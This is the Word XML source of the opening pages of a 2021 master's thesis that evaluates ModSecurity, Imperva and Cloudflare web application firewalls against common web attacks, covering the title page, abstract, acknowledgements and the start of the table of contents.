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6EA85" w14:textId="77777777" w:rsidR="0080251F" w:rsidRPr="00822F34" w:rsidRDefault="0080251F" w:rsidP="0080251F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="323E4F" w:themeColor="text2" w:themeShade="BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="460FAF55" w14:textId="4E67FE7F" w:rsidR="0080251F" w:rsidRDefault="0080251F" w:rsidP="0080251F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ABAE1A1" w14:textId="77777777" w:rsidR="00822F34" w:rsidRPr="00822F34" w:rsidRDefault="00822F34" w:rsidP="00822F34">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62C62080" w14:textId="77777777" w:rsidR="0080251F" w:rsidRPr="00CC7875" w:rsidRDefault="0080251F" w:rsidP="0080251F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC7875">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C7D8B4F" wp14:editId="07563DC7">
            <wp:extent cx="1508760" cy="6477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8760" cy="647700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D9B96C" w14:textId="77777777" w:rsidR="0080251F" w:rsidRPr="00822F34" w:rsidRDefault="0080251F" w:rsidP="0080251F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="229DEB9B" w14:textId="51A9AD3F" w:rsidR="0080251F" w:rsidRPr="00FE0A4E" w:rsidRDefault="00993F8B" w:rsidP="0080251F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993F8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Effectiveness of open-source and leading industry web application firewalls against client and </w:t>
      </w:r>
      <w:r w:rsidR="00AA4355" w:rsidRPr="00993F8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>server-side</w:t>
      </w:r>
      <w:r w:rsidRPr="00993F8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F646EBB" w14:textId="77777777" w:rsidR="0080251F" w:rsidRPr="00822F34" w:rsidRDefault="0080251F" w:rsidP="0080251F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Submitted by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF8BD9B" w14:textId="2560DE61" w:rsidR="0080251F" w:rsidRPr="00822F34" w:rsidRDefault="00822F34" w:rsidP="0080251F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>Muhammad Kashfun Nazir BIN MOHD ALI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638ED84F" w14:textId="77777777" w:rsidR="0080251F" w:rsidRPr="00822F34" w:rsidRDefault="0080251F" w:rsidP="0080251F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A0D2DA1" w14:textId="6A3441BD" w:rsidR="0080251F" w:rsidRPr="00822F34" w:rsidRDefault="0080251F" w:rsidP="0080251F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Thesis Advisor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC163F1" w14:textId="15DFF033" w:rsidR="0080251F" w:rsidRPr="00822F34" w:rsidRDefault="00822F34" w:rsidP="0080251F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>Asst. Prof. Dinh Tien Tuan Anh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4223E3D3" w14:textId="77777777" w:rsidR="0080251F" w:rsidRPr="00822F34" w:rsidRDefault="0080251F" w:rsidP="0080251F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>ISTD (MSSD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E7F63B" w14:textId="77777777" w:rsidR="0080251F" w:rsidRPr="00822F34" w:rsidRDefault="0080251F" w:rsidP="0080251F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EDE3ACE" w14:textId="77777777" w:rsidR="0080251F" w:rsidRPr="00822F34" w:rsidRDefault="0080251F" w:rsidP="0080251F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>A thesis submitted to the Singapore University of Technology and Design in fulfillment of the requirement for the degree of Master of Science in Security by Design (MSSD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCC9E54" w14:textId="7F83467E" w:rsidR="00822F34" w:rsidRDefault="00822F34" w:rsidP="00822F34">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E969DE1" w14:textId="742EA714" w:rsidR="00515265" w:rsidRPr="00822F34" w:rsidRDefault="00515265" w:rsidP="0080251F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C242CD" w14:textId="3233898A" w:rsidR="00563AD7" w:rsidRPr="007511F9" w:rsidRDefault="00563AD7" w:rsidP="008C7C9C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007511F9">
        <w:lastRenderedPageBreak/>
        <w:t>Abstract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3298CA5F" w14:textId="2E905924" w:rsidR="00563AD7" w:rsidRDefault="004C1CB6" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The cyber security industry has grown exponentially over the recent years, where costs for cybercrime is expected to grow by 15 percent annually. The costs for cybercrime in 2015 was at USD 3 trillion and is projected to hit USD 10.5 trillion by the year 2025. In proportion, the cyber security industry will continue to grow as shown in technology services such as security operation centres (SOC), where it is projected to grow to USD 1.656 billion by 2025 from USD 471 million.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B88288" w14:textId="119FBF50" w:rsidR="00082644" w:rsidRDefault="00FA1F37" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Today, millions of websites and web applications sit on the world wide web. Between 2017 and 2019, it was found by a single company that a total of almost 8 billion cyber-attacks across all industries were detected.</w:t>
      </w:r>
      <w:r w:rsidR="003E2C0D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00404715">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The trend of common attack vectors against web applications have not changed much since 2017. All of which were classified in 2017 by OWASP through the OWASP Top 10 project.</w:t>
      </w:r>
      <w:r w:rsidR="00FA3632">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> These attacks targeting web applications could be prevented through the use of proper security tools such as the web application firewall</w:t>
      </w:r>
      <w:r w:rsidR="000C3E98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (WAF)</w:t>
      </w:r>
      <w:r w:rsidR="00FA3632">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A34B2CB" w14:textId="3F3E5369" w:rsidR="000C3E98" w:rsidRDefault="000C3E98" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">This thesis explored and studied the effectiveness of WAFs </w:t>
      </w:r>
      <w:r w:rsidR="000964A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">against cyber-attacks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>by testing based on four factors; price, performance, alerts/usability and security.</w:t>
      </w:r>
      <w:r w:rsidR="0084745E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The WAFs involved in the tests were ModSecurity, an open-source WAF, Imperva Cloud WAF and Cloudflare cloud WAF.</w:t>
      </w:r>
      <w:r w:rsidR="0005362A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> This thesis found some significant findings from the tests and concluded the effectiveness of WAF against cyber-attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44146F4B" w14:textId="2E9CB51E" w:rsidR="004C1CB6" w:rsidRPr="00DE6606" w:rsidRDefault="005E1A8F" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0DDB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Keywords</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: web application firewall, OWASP Top 10, ModSecurity, Imperva Cloud WAF, Cloudflare cloud WAF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DB170D" w14:textId="541021A4" w:rsidR="00563AD7" w:rsidRPr="00DE6606" w:rsidRDefault="00563AD7" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E77B34" w14:textId="37AA6C16" w:rsidR="00563AD7" w:rsidRPr="00DE6606" w:rsidRDefault="00563AD7" w:rsidP="008C7C9C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:lastRenderedPageBreak/>
        <w:t>Acknowledgements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20015D7D" w14:textId="430497D9" w:rsidR="00563AD7" w:rsidRDefault="00CB0281" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The entire process of writing this thesis </w:t>
      </w:r>
      <w:r w:rsidR="002B3310">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>was an experience like never before. I have learned a lot and gained plenty of knowledge and experience from this experience.</w:t>
      </w:r>
      <w:r w:rsidR="009E3EAF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Completing this thesis gave me a huge sense of accomplishment that I would never forget.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2242334E" w14:textId="370FDA65" w:rsidR="000010D1" w:rsidRDefault="000010D1" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>I would firstly like to thank my wife for being very supportive and understanding throughout my journey of attaining my Master’s. It was not easy juggling time while having a baby in the house, always in constant need of attention.</w:t>
      </w:r>
      <w:r w:rsidR="0005675D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> My wife has sacrificed a lot for me so that I could complete my thesis, especially towards the last lap.</w:t>
      </w:r>
      <w:r w:rsidR="00795598">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> I would also like to thank my parents and siblings for believing in me and providing me with moral support, especially during the many times I felt like giving up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763A13DA" w14:textId="16F16B22" w:rsidR="00D57FAF" w:rsidRDefault="00D57FAF" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Next, I would like to thank my thesis advisor, Asst. Prof. Anh for his unwavering support and patience in me. Having changed my topic a few times, I can only imagine how difficult of a student I must have been to him. Despite that, he did not cast me aside and continued to give me the support I required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C385BE" w14:textId="24609859" w:rsidR="00D57FAF" w:rsidRDefault="00D57FAF" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>I would like to give special thanks to my programme director cum mentor, Yeaz Jaddoo, for being my pillar of strength during my entire Master’s journey.</w:t>
      </w:r>
      <w:r w:rsidR="003B4C7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> He provided me with emotional and moral support countless ti</w:t>
      </w:r>
      <w:r w:rsidR="00293A14">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>mes. His advices have changed my life and impacted my career in many ways he might not have imagined. It is thanks to him that I was able to get this far academically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C152F8" w14:textId="03A5F655" w:rsidR="00E53D0F" w:rsidRDefault="00E53D0F" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Lastly, I would like to give thanks to my course mates and colleagues for their support and ideas. They have made my journey more fun and memorable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E7DD1E" w14:textId="7FCD9F13" w:rsidR="00B1611E" w:rsidRPr="00B1611E" w:rsidRDefault="00B1611E" w:rsidP="00B1611E">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1611E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kashfun Nazir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271BA075" w14:textId="69E76113" w:rsidR="00563AD7" w:rsidRPr="00DE6606" w:rsidRDefault="00563AD7" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:id w:val="-2057534664"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="0B7A4191" w14:textId="43EEFEB8" w:rsidR="00DD2F93" w:rsidRPr="00C71C5B" w:rsidRDefault="00DD2F93" w:rsidP="007926B0">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:spacing w:line="360" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:cs="Arial"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00C71C5B">
            <w:rPr>
              <w:rFonts w:cs="Arial"/>
            </w:rPr>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="70247F33" w14:textId="7CD2C3D8" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00DD2F93">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00C71C5B">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00C71C5B">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00C71C5B">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc71138464" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>List of Figures</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_Toc71138464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8</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4330B6DF" w14:textId="1931039A" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138465" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>List of Tables</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_Toc71138465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8</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3EE45FDB" w14:textId="7AE2A0B2" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138466" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1. Introduction</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_Toc71138466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9</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
